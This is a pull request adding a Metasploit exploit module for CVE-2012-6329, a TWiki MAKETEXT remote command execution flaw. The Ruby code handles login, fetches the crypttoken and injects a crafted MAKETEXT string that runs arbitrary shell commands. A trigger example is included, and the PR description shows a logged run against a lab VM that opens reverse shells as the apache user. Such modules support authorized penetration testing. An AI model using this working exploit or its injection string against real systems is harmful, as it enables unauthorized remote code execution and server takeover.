### PR TITLE
Added module for CVE-2012-6329

### DIFF
--- a/modules/exploits/unix/webapp/twiki_maketext.rb
+++ b/modules/exploits/unix/webapp/twiki_maketext.rb
@@ -1,0 +1,232 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'TWiki MAKETEXT Remote Command Execution',
+			'Description'    => %q{
+					This module exploits a vulnerability in the MAKETEXT Twiki variable. Using a
+				specially crafted MAKETEXT, a malicious user can execute shell commands since user
+				input is passed to the Perl "eval" command without first being sanitized. The
+				problem is caused by an underlying security issue in the CPAN:Locale::Maketext
+				module. This works in TWiki sites that have user interface localization enabled
+				(UserInterfaceInternationalisation variable set).
+
+				If USERNAME and PASSWORD credentials aren't provided anonymous access will be
+				intended. On the other hand, if the  TwikiPage option isn't provided, the module
+				will try to create a random page on the SandBox space. The modules has been tested
+				successfully on TWiki 5.1.2 as  distributed with the official TWiki-VM-5.1.2-1
+				virtual machine.
+			},
+			'Author'         =>
+				[
+					'George Clark', # original discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2012-6329' ],
+					[ 'OSVDB', '88460' ],
+					[ 'BID', '56950' ],
+					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]
+				],
+			'Privileged'     => false, # web server context
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'BadChars'    => '',
+					'Space'       => 1024,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic ruby python bash telnet',
+						}
+				},
+			'Platform'       => [ 'unix' ],
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Dec 15 2012',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),
+				OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),
+				OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
+				OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
+			], self.class)
+	end
+
+	def do_login(username, password)
+		res = send_request_cgi({
+			'method'   => 'POST',
+			'uri'      => "#{@base}do/login",
+			'vars_post' =>
+				{
+					'username' => username,
+					'password' => password
+				}
+			})
+
+		if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/
+			return nil
+		end
+
+		session = $1
+		return session
+	end
+
+	def inject_code(session, code)
+
+		vprint_status("Retrieving the crypttoken...")
+
+		res = send_request_cgi({
+			'uri'      => "#{@base}do/edit#{@page}",
+			'cookie'   => "TWIKISID=#{session}",
+			'vars_get' =>
+				{
+					'nowysiwyg' => '1'
+				}
+		})
+
+		if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/
+			vprint_error("Error retrieving the crypttoken")
+			return nil
+		end
+
+		crypttoken = $1
+		vprint_good("crypttoken found: #{crypttoken}")
+
+		if session.empty?
+			if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/
+				session = $1
+			else
+				vprint_error("Error using anonymous access")
+				return nil
+			end
+		end
+
+		vprint_status("Injecting the payload...")
+
+		res = send_request_cgi({
+			'method'   => 'POST',
+			'uri'      => "#{@base}do/save#{@page}",
+			'cookie'   => "TWIKISID=#{session}",
+			'vars_post' =>
+			{
+				'crypttoken' => crypttoken,
+				'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%"
+			}
+		})
+
+		if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/
+			print_warning("Error injecting the payload")
+			print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
+			return nil
+		end
+
+		location = URI(res.headers['Location']).path
+		print_good("Payload injected on #{location}")
+
+		return location
+	end
+
+	def check
+		@base = target_uri.path
+		@base << '/' if @base[-1, 1] != '/'
+
+		res = send_request_cgi({
+			'uri'      => "#{@base}do/view/TWiki/WebHome"
+		})
+
+		if not res or res.code != 200
+			return Exploit::CheckCode::Unknown
+		end
+
+		if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/
+			version = $1
+			print_status("Version found: #{version}")
+			if version < "5.1.3"
+				return Exploit::CheckCode::Appears
+			else
+				return Exploit::CheckCode::Safe
+			end
+		end
+
+		return Exploit::CheckCode::Detected
+	end
+
+
+	def exploit
+
+		# Init variables
+		@page = ''
+
+		if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?
+			@page << '/' if datastore['TwikiPage'][0] != '/'
+			@page << datastore['TwikiPage']
+		else
+			@page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"
+		end
+
+		@base = target_uri.path
+		@base << '/' if @base[-1, 1] != '/'
+
+		# Login if needed
+		if (datastore['USERNAME'] and
+			not datastore['USERNAME'].empty? and
+			datastore['PASSWORD'] and
+			not datastore['PASSWORD'].empty?)
+			print_status("Trying login to get session ID...")
+			session = do_login(datastore['USERNAME'], datastore['PASSWORD'])
+		else
+			print_status("Using anonymous access...")
+			session = ""
+		end
+
+		if not session
+			fail_with(Exploit::Failure::Unknown, "Error getting a session ID")
+		end
+
+		# Inject payload
+		print_status("Trying to inject the payload on #{@page}...")
+		res = inject_code(session, payload.encoded)
+		if not res
+			fail_with(Exploit::Failure::Unknown, "Error injecting the payload")
+		end
+
+		# Execute payload
+		print_status("Executing the payload through #{res}...")
+		res = send_request_cgi({
+			'uri'      => res,
+			'cookie'   => "TWIKISID=#{session}"
+		})
+		if not res or res.code != 200 or res.body !~ /HASH/
+			fail_with(Exploit::Failure::Unknown, "Error executing the payload")
+		end
+
+		print_good("Exploitation was successful")
+
+	end
+
+end
+
+=begin
+
+* Trigger:
+
+%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%
+
+=end


### PR DESCRIPTION
Tested with TWiki-VM-5.1.2-1.zip as distributed by twiki :

<pre>
msf > use exploit/unix/webapp/twiki_maketext 
msf  exploit(twiki_maketext) > show options

Module options (exploit/unix/webapp/twiki_maketext):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password to authenticate with (anonymous if password not provided)
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       TWiki base path
   TwikiPage                   no        TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)
   USERNAME                    no        The user to authenticate as (anonymous if username not provided)
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(twiki_maketext) > set USERNAME JuanMsf
USERNAME => JuanMsf
msf  exploit(twiki_maketext) > set PASSWORD admin1234
PASSWORD => admin1234
msf  exploit(twiki_maketext) > set RHOST 192.168.1.134
RHOST => 192.168.1.134
msf  exploit(twiki_maketext) > rexploit
[*] Reloading module...
[*] Started reverse double handler

[*] Trying login to get session ID...
[*] Trying to inject the payload on /Sandbox/YevYff...
[+] Payload injected on /do/view/Sandbox/YevYff
[*] Executing the payload through /do/view/Sandbox/YevYff...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Exploitation was successful
[*] Command: echo hidLZJXcUffgpq4g;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 1: Trying: command not found\r\nsh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nhidLZJXcUffgpq4g\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.134:39010) at 2012-12-21 11:26:26 +0100

id
uid=48(apache) gid=48(apache) groups=48(apache)
^C
Abort session 1? [y/N]  y

[*] 192.168.1.134 - Command shell session 1 closed.  Reason: User exit
msf  exploit(twiki_maketext) > set payload cmd/unix/reverse_python 
payload => cmd/unix/reverse_python
msf  exploit(twiki_maketext) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Trying login to get session ID...
[*] Trying to inject the payload on /Sandbox/TllAhe...
[+] Payload injected on /do/view/Sandbox/TllAhe
[*] Executing the payload through /do/view/Sandbox/TllAhe...
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.134:39012) at 2012-12-21 11:26:55 +0100

^C[-] Exploit failed: Interrupt 

bash: no job control in this shell
bash-3.2$ id  
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.2$ exit

[*] 192.168.1.134 - Command shell session 2 closed.  Reason: Died from EOFError
^C
Abort session 2? [y/N]  y

</pre>
